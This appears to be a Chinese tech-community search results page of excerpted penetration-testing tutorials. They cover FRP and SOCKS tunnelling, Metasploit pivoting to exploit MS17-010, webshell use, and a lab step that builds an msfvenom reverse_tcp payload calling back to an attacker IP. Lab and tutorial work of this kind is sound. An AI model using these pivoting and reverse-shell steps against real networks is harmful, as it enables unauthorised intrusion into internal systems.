首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

FRP 反向代理渗透

前言 之前在一个项目中遇到了一个渗透环境,只能使用工具代理远程访问内网,于是便接触了FRP这款内网穿透工具,通过内网反向代理进行远程渗透测试。...这篇文章就简单介绍如何实现FRP反向代理渗透,作为个人笔记方便以后查阅,也分享给大家提供参考。...web系统了 0x06 Burp 代理抓包 做渗透测试的话,抓取数据包是必不可少的步骤,接下来介绍如何用Burp抓取访问内网web系统的数据包。...0x07 AWVS 代理扫描 同样,渗透测试也必须要对内网系统进行扫描测试,可以用到的扫描器有很多,例如常见的AWVS、Nessus、AppScan等等。...以 AWVS 10.5 为例,设置AWVS的代理,内容为服务器的公网ip和9876端口 设置完代理后,就可以对内网web站点进行渗透扫描了 0x08 SQLmap 代理测试 当扫描器扫出来SQL注入点后

1.2K100
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    通过SOCKS代理渗透整个内网

    通过SOCKS代理渗透整个内网 1.背景 经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。...3.第一次使用SOCKS代理渗透内网 3.1SOCKS代理 1)SOCKS Socks是一种代理服务,可以简单地将一端的系统连接到另外一端,支持多种协议,包括http、ftp请求及其它类型的请求。...3)ProxyChains ProxyChains是Linux下的代理工具,kali已经安装,它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4和SOCKS5类型的代理服务器.../ew_linux_x64 -s rcsocks -l 1080 -e 1234 该命令的意思是在kali上添加一个转接隧道,把本地1080端口收到的代理请求转交给1234端口。...第二次使用SOCKS代理渗透内网 5.1内网拓扑图 5.2再次代理 1)分析 (1)第一次socks代理 通过第一次socks代理:在kali上添加一个转接隧道,把1080端口收到的代理请求转交给1234

    1.5K30

    Linux内网渗透

    这里分享一些之前渗透测试中常用的方式。在造成最小影响的情况下,构建稳定的内网代理通道。 第一个工具:SSH SSH在渗透测试中往往扮演了非常重要的角色。...其次是配置代理规则,规则中可以详细指定,什么应用,访问什么站点的时候,使用哪一条代理链路。 在渗透测试的时候,这样的多链路代理会有比较大的用处。...最后,渗透测试结束的时候,务必清除你创建的所有代理链路。毕竟,这些代理隧道已经打破了内网的访问控制策略了。...Linux内网渗透 收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息中,最重要的之一便是肉鸡的网络环境。...linux内网安全建议 说了这么多内网渗透的套路,按惯例最后该给出内网安全建设的几点建议了,当然只是个人看法。

    6.8K40

    初学内网渗透代理跳板攻击

    查看已经添加的路由:run autoroute -p 扫描该网段下的主机:run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24 4.使用socket代理...cp /usr/lib/proxychains3/proxyresolv /usr/bin/ proxyresolv 1.1.2.1 代理配置成功!...[aru_31] 5.最后利用代理打开msf进行跳板攻击 启动命令:proxychains msfconsole 使用ms17-010漏洞(因为是事先准备好的靶机,所以知道存在什么漏洞,不知道的情况下...,大家只有去扫了) 注意:因为这里我们是用的代理去进行攻击的,所以payload需要设置成bind的,如:windows/x86/meterpreter/bind_tcp 设置好相关参数直接攻击就可以了...(通过代理攻击成功,已经拿到1.1.2.1的权限[aru_23]) 总结 自己胡乱搭建的内网环境,中间也出现了一些问题,不过还算是成功了吧,写的比较乱,如果发现二层网络里还有其他网络的话就需要进行多层跳板代理

    91410

    【内网渗透】关于内网代理转发技术

    Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linux版lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...Linux版lcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ? 通过gcc进行编译后即可使用: gcc portmap.c -o lcx ?...尝试连接linux的8888端口: ? 成功连接至window的3389端口: ? Part.2 Netsh 本地端口转发 Netsh 是Windows自带的命令行脚本工具,它可以建立端口映射。...reGeorg+proxychains 攻击机如果为linux环境,则使用proxychains进行代理。第一步依然是将webshell上传至目标服务器: ?...可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 代理后尝试访问内网服务器80端口: ? //成功~ 或者使用Proxifier开启代理: ? 配置代理规则: ?

    2.6K21

    linux代理设置

    http代理 有些局域网环境上网需要使用代理上网,图形界面的很好解决就设置一下浏览器的代理就好了,但是Linux纯命令行的界面就需要手动配置了。      ...;   https_proxy:https协议使用安全代理地址;   ftp_proxy:ftp协议使用代理服务器地址;   user:代理使用的用户名;   password:代理使用用户名的密码;...常用linux程序配置代理服务器的方法: [ 通用代理服务器配置 ] 对于大多数Linux控制台程序,例如Debian或Ubuntu中的apt-get和aptitude命令、git命令、wget命令,这些程序都使用...ia32:printing-4.0-noarch   Distributor ID: RedHatEnterpriseServer   Description:    Red Hat Enterprise Linux...;">http://192.168.3.171:3128 export的效力仅及于该此登陆操作,非全局,详细内容可参考:linux环境变量 export命令详解    这样就可以让不能访问外部网络的内网机器通过可以访问外网的机器做为代理访问到外部网络

    9K10

    Linux代理配置

    系统全局HTTP代理 注意 这种方式只适合http代理 设置全局代理,需要编辑profile文件 vi /etc/profile 末尾添加以下代理配置,参考代理是否需要用户名密码 #无用户名密码...; https_proxy:https协议使用安全代理地址; ftp_proxy:ftp协议使用代理服务器地址; user:代理使用的用户名; password:代理使用用户名的密码; proxy.abc.com...:代理地址,可以是IP,也可以是域名; 8080:使用的端口; no_proxy:不使用代理的主机或IP。...google.com 80 转换Socks代理 系统代理只能设置HTTP代理,但是使用privoxy将socks5转换为http代理 安装privoxy yum install -y privoxy...://127.0.0.1:8118 export https_proxy=http://127.0.0.1:8118 注:8118是privoxy默认使用的端口 配置Socks5代理软件 Linux 有一个能够强迫任何软件通过

    3.4K50

    Kali Linux渗透测试技术详解_渗透测试入门

    Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4....Kali Linux是做渗透测试用的 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。...不论测试方法是否相同,渗透测试通常具有两个显著特点: 渗透测试是一个渐进的且逐步深入的过程。 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。...渗透测试所需的工具可以在各种Linux操作系统中找到,需要手动安装这些工具。由于工具种类繁杂,安装这些工具会变成一个浩大的工程。...为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中最典型的就是Kali Linux。 该系统主要用于渗透测试。

    4.5K20

    网站安全渗透 之squid代理漏洞挖掘与修复

    在对网站进行渗透测试的时候,发现很多网站都在使用squid反向代理系统,该系统存在可以执行远程代码的漏洞,很多客户找我们SINE安全做渗透测试服务的同时,我们会先对客户的网站进行信息搜集工作,包括域名...,二级域名收集,网站使用的反向代理系统,网站程序开发语言,是否使用开源的代码,以及网站后台路径收集,都在前期渗透中需要做的。...安全,我们对该情况进行详细的了解,针对实际情况,定制了详细的渗透测试服务方案。...squid是开源的一套网站反向代理系统,可以对网站进行加速,缓存,有些网站访问较慢,就会在国内的服务器节点做反向代理,加速网站的快速访问,将图片,以及JS文件,css文件进行缓存,还有一个好处通过squid...漏洞的利用方式是,构造恶意的代码,使用FTP协议的方式进行请求 request-uri,将代码加密,提交到服务器中去,就可以达到渗透服务器的权限。代码如下: ? ?

    1.2K20

    socks4代理网络渗透测试实验

    实验目的:利用代理功能对2层网络进行渗透 测试靶机 ubantu 192.168.31.207 192.168.1.129 ubantu 192.168.1.100...然后抓包修改文件类型,将 改为 放包就上传成功了 菜刀连接文件地址 kali打开msf控制台,设置模块exploit/multi/handler set payload linux...x64/meterpreter/reverse_tcp set LHOST 192.168.31.43 set LPORT 8888 利用msfvenom生成elf木马 msfvenom -p linux.../elf 成功获得一个会话连接 添加一个路由 run autoroute -s 192.168.1.0/24 本地设置socks4代理 use auxiliary/server/...,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具

    62310
    领券